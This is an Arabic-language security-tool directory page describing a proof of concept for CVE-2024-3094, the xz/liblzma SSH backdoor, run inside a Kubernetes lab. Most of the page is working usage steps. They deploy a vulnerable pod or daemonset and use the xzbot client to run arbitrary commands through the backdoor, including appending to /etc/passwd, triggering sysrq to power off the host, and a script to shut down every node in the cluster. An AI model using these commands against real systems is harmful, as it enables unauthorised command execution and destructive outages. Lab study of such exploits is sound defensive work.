Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-3094 — POC أساسي لاختبار ثغرة CVE-2024-3094 داخل K8s cluster | Kitploit
أدوات/GitHubGitHub/shefirot/cve-2024-3094
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقأمن السحابةالتعلم والتعليمالهروب من الحاوية
GitHubshefirot/cve-2024-3094

CVE-2024-3094

POC أساسي لاختبار ثغرة CVE-2024-3094 داخل K8s cluster

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-3094

POC أساسي لاختبار ثغرة CVE-2024-3094 داخل مجموعة K8s

❗ إخلاء مسؤولية ❗

استخدم فقط للأغراض التعليمية، المؤلف ليس مسؤولاً عن أي ضرر ناتج عن استخدام هذا البرنامج

الوصف

سنقوم بنشر بود ضعيف واستغلاله لتنفيذ أوامر داخل تلك البودات الضعيفة، سنفعل ذلك داخل نفس الشبكة لأسباب أمنية. لن نقوم بتعريض البود الضعيف للإنترنت، لكن المفهوم نفسه.

تتيح هذه الثغرة تنفيذ أوامر داخل البود، حتى لو كان البود يعمل بسياق أمني، يمكنك مثلاً إيقاف تشغيل المضيف الذي يعمل عليه البود.

إذا كانت هذه الثغرة تعمل في بود واحد، يمكنك إيقاف تشغيل المضيف، مما يجعل جميع الخدمات التي تعمل على هذا المضيف غير متاحة مؤقتاً. ولكن، إذا كانت الثغرة تعمل كـ daemonset، يمكنك إيقاف تشغيل جميع المضيفات التي تعمل عليها تلك الـ daemonset، وقد يتسبب ذلك في إيقاف تشغيل المجموعة بأكملها.

المتطلبات

  • مجموعة K8s منشورة
  • Kubectl مثبت
  • الوصول إلى مجموعة K8s
  • Go مثبت

الاستخدام

أولاً، قم بتثبيت xzbots في المجموعة

root@kitploit:~
go install github.com/amlweems/xzbot@latest

قم بتنزيل المستودع ونشر الـ deployment/daemonset الضعيف

root@kitploit:~
git clone https://github.com/shefirot/CVE-2024-3094.git
cd CVE-2024-3094
# Deployment
kubectl apply -f deploy_cve-2024-3094.yml
# أو daemonset
kubectl apply -f daemonset_cve-2024-3094.yml
root@kitploit:~
# احصل على اسم البود
kubectl -n vulnes get pods

# قم بعمل port forward للبود
kubectl -n vulnes port-forward <pod-name> 2225:22

# نفّذ أمراً، مثلاً للكتابة في /etc/passwd
$HOME/go/bin/xzbot -addr 127.0.0.1:2225 -cmd 'echo "David estuvo aqui" >> /etc/passwd'

# تحقق من ملف /etc/passwd
kubectl -n vulnes exec <pod-name> -- /usr/bin/cat /etc/passwd

تقدم وأوقف تشغيل المضيف

root@kitploit:~
# تفعيل sysrq
$HOME/go/bin/xzbot -addr 127.0.0.1:2225 -cmd 'echo 1 > /proc/sys/kernel/sysrq'

# إيقاف تشغيل المضيف
$HOME/go/bin/xzbot -addr 127.0.0.1:2225 -cmd 'echo o > /proc/sysrq-trigger'

يمكنك أيضاً إيقاف تشغيل جميع المضيفات التي تعمل عليها الـ daemonset

root@kitploit:~
source shutdown_nodes.sh

المشكلات المعروفة

1. رفض الاتصال

عند تنفيذ الحلقة لإيقاف تشغيل جميع المضيفات، إذا تلقيت هذا الخطأ:

root@kitploit:~
2024/06/11 12:08:58 dial tcp 127.0.0.1:2225: connect: connection refused

امنح مزيداً من الوقت ليكون port forward جاهزاً، يمكنك زيادة وقت النوم (sleep) في الحلقة.

معلومات إضافية

تم إنشاء صورة الحاوية المستخدمة باستخدام ملف dockerfile الموجود في المستودع، يمكنك إنشاء الصورة ودفعها إلى سجل الصور الخاص بك.

لإنشاء مكتبة liblzma.so.5.6.0.patch، يمكنك استخدام مستودع amlweems المذكور في المراجع.

المراجع

مستودع amlweems

مستودع r0binak

تنزيل الأداة